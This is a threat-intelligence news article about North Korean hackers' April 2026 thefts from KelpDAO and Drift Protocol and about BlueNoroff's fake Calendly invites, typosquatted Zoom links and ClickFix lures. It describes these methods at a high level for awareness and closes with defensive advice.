In two weeks in April 2026, North Korean state-sponsored hackers stole an estimated $575 million from two cryptocurrency platforms — $290 million from KelpDAO and $285 million from Drift Protocol. These are not the work of opportunistic cybercriminals. They are operations conducted by a division of the North Korean intelligence apparatus whose sole function is stealing cryptocurrency to fund the Kim regime’s weapons programs and evade international sanctions. And they get in not through zero-day exploits or brute-force attacks, but through something far more mundane: a fake calendar invite.
North Korea has now stolen more cryptocurrency than any other single entity on earth. Chainalysis estimated that crypto-theft operations linked to North Korea totaled $3.4 billion in 2025 alone. The April 2026 figures suggest 2026 is on pace to exceed that. Understanding how this operation works — its structure, its methods, and its targets — matters for everyone in or adjacent to the cryptocurrency industry.
The Two April Heists
KelpDAO: $290 Million
On approximately April 18, 2026, KelpDAO — a decentralized finance (DeFi) protocol operating on Ethereum — was drained of approximately $290 million. The attack was attributed with high confidence to TraderTraitor, a North Korean hacking unit that specializes in targeting cryptocurrency exchanges, DeFi protocols, and blockchain infrastructure companies. TraderTraitor is a sub-group operating under the broader Lazarus Group umbrella.
The specific attack vector for the KelpDAO heist has not been fully disclosed. DeFi protocol heists typically involve compromising developer or administrator credentials, exploiting smart contract vulnerabilities, or compromising the infrastructure of third-party service providers with privileged access. Lazarus Group has demonstrated proficiency in all three approaches across its documented history.
Drift Protocol: $285 Million
The Drift Protocol hack, netting approximately $285 million, was also attributed to North Korean hackers in April, though specific attribution details varied across researcher assessments at the time of reporting. Drift is a perpetuals trading protocol on the Solana blockchain.
The combined $575 million from these two operations in a single month exceeds the annual GDP of several small nations.
The Entry Method: Fake Zoom Calls and Calendar Invites
While the KelpDAO and Drift heists targeted protocols directly, North Korea’s parallel campaign against individual cryptocurrency company employees uses a social engineering methodology that cybersecurity firm Infosecurity Magazine and others have documented in detail.
The operation, attributed to BlueNoroff (another Lazarus sub-unit focusing on financial sector targets), runs as follows:
Phase 1: Target Identification
BlueNoroff researchers identify employees at cryptocurrency companies — specifically those with access to high-value systems: developers, infrastructure engineers, finance personnel, and executives. LinkedIn, GitHub, and industry conference attendee lists provide the target pool.
Phase 2: The Calendly Lure
The attacker, impersonating a legitimate figure from the fintech or venture capital industry, sends the target a Calendly meeting invitation. Calendly is a widely trusted scheduling tool; receiving a meeting invite from a professional contact is a routine, low-suspicion event. The invite appears to be a legitimate business meeting — a potential investment conversation, a partnership discussion, a speaking opportunity.
Phase 3: The Typosquatted Zoom Link
The Calendly invite contains a link to a typosquatted Zoom meeting — a URL that closely resembles a legitimate Zoom link (e.g., zoom.us.meeting-room[.]com instead of zoom.us) but routes to attacker-controlled infrastructure. When the target clicks to join the meeting, they are directed to a page requesting standard-seeming actions — downloading an updated Zoom client, running a meeting launcher, or clicking through a browser prompt.
Phase 4: Multi-Stage Malware Deployment
The fake Zoom infrastructure delivers a multi-stage malware package. Documented components include:
- Keyloggers — capturing credentials, private keys, and session tokens as the victim types them
- Backdoors — maintaining persistent access to the infected system after the initial session
- Crypto stealers — scanning the system for browser extension wallets, hardware wallet software, and stored seed phrases
- Remote access tools — allowing operators to explore the compromised system, move laterally through connected networks, and identify high-value targets for exfiltration
In one documented intrusion at a North American cryptocurrency company (beginning January 23, 2026), up to eight separate malicious binaries were deployed across the execution chain. The compromise was not detected during the initial stage.
Phase 5: Exfiltration and Laundering
Once access to target systems is established, Lazarus operators systematically identify and exfiltrate private keys, authentication tokens, and administrative credentials that enable access to protocol treasuries, cold wallets, or exchange accounts. Stolen cryptocurrency is then laundered through a series of mixers, cross-chain bridges, and peer-to-peer exchanges to obscure the trail before converting to fiat through jurisdictions with limited anti-money-laundering enforcement.
The Scale of North Korea’s Crypto Theft Enterprise
North Korea’s cryptocurrency theft program is not a side operation. It is a primary economic activity for the regime.
UN Panel of Experts reports estimate that cryptocurrency theft funds a significant portion of North Korea’s weapons development programs, including its ballistic missile and nuclear programs. The economic sanctions that were intended to pressure the regime have, counterintuitively, increased its dependence on cyber-enabled revenue sources — including crypto theft, ransomware, and the deployment of thousands of North Korean IT workers to remote jobs at Western technology companies under false identities.
Chainalysis’ 2026 crypto crime report places North Korea-linked theft at $3.4 billion in 2025. With $575 million confirmed in April alone, 2026 appears set to exceed that figure.
The targets have evolved. Early Lazarus operations focused on cryptocurrency exchanges with centralized custodial wallets. As exchanges improved security, the group shifted toward DeFi protocols, which often have more complex attack surfaces and fewer mature security practices. The simultaneous targeting of individual employees through social engineering reflects an understanding that human access — a developer with admin credentials, an engineer with a hardware wallet — remains easier to exploit than hardened protocol infrastructure.
The ClickFix Variant: Clipboard Injection
BlueNoroff’s campaign also deploys a technique called ClickFix — a social engineering approach where victims are instructed to paste a command into their computer’s terminal or run dialog. The instructions appear as part of a website verification step, a CAPTCHA alternative, or a software installation process.
The pasted command, which the victim enters manually, runs malicious code that downloads and executes the malware payload. Because the victim themselves types the command, endpoint security tools that would catch automatic execution may not trigger. ClickFix has become a favored technique across multiple threat actor groups because of its simplicity and effectiveness against security-aware targets who would recognize an automatic download prompt as suspicious.
What This Means Beyond Crypto
For readers who don’t work in cryptocurrency, the Lazarus Group’s social engineering playbook is relevant because the techniques are not industry-specific. Fake calendar invites, typosquatted meeting links, and ClickFix clipboard injection attacks are being used against targets in traditional finance, defense contracting, pharmaceutical research, and government.
The specific targeting of Calendly and Zoom reflects the tools that became near-universal during the pandemic era of remote work. Any platform that employees trust enough to click without careful scrutiny becomes a viable attack vector.
The defenses are straightforward in principle, even if difficult to maintain under real-world time pressure:
- Verify meeting links carefully before clicking — check the full domain, not just the visual appearance of the URL
- Never download software or run commands prompted by a meeting invite or website you didn’t specifically navigate to
- Use hardware security keys for authentication where possible — they are resistant to credential phishing in ways that software MFA is not
- Report suspicious calendar invites to your security team before joining — a five-minute check is a much smaller cost than a system compromise
For organizations in the cryptocurrency space, the BlueNoroff campaign represents an active, well-resourced, and state-backed threat that will continue adapting to available attack surfaces. The $575 million stolen in April 2026 alone makes it one of the most consequential ongoing security threats in the industry.
Sources: TechCrunch: North Korean hackers blamed for $290M crypto theft · Infosecurity Magazine: North Korean Hackers Target Crypto Firms with ClickFix and Zoom Lures · UPI: KelpDAO hack attributed to TraderTraitor · Chainalysis: 2025 Crypto Crime Report · CoinDesk
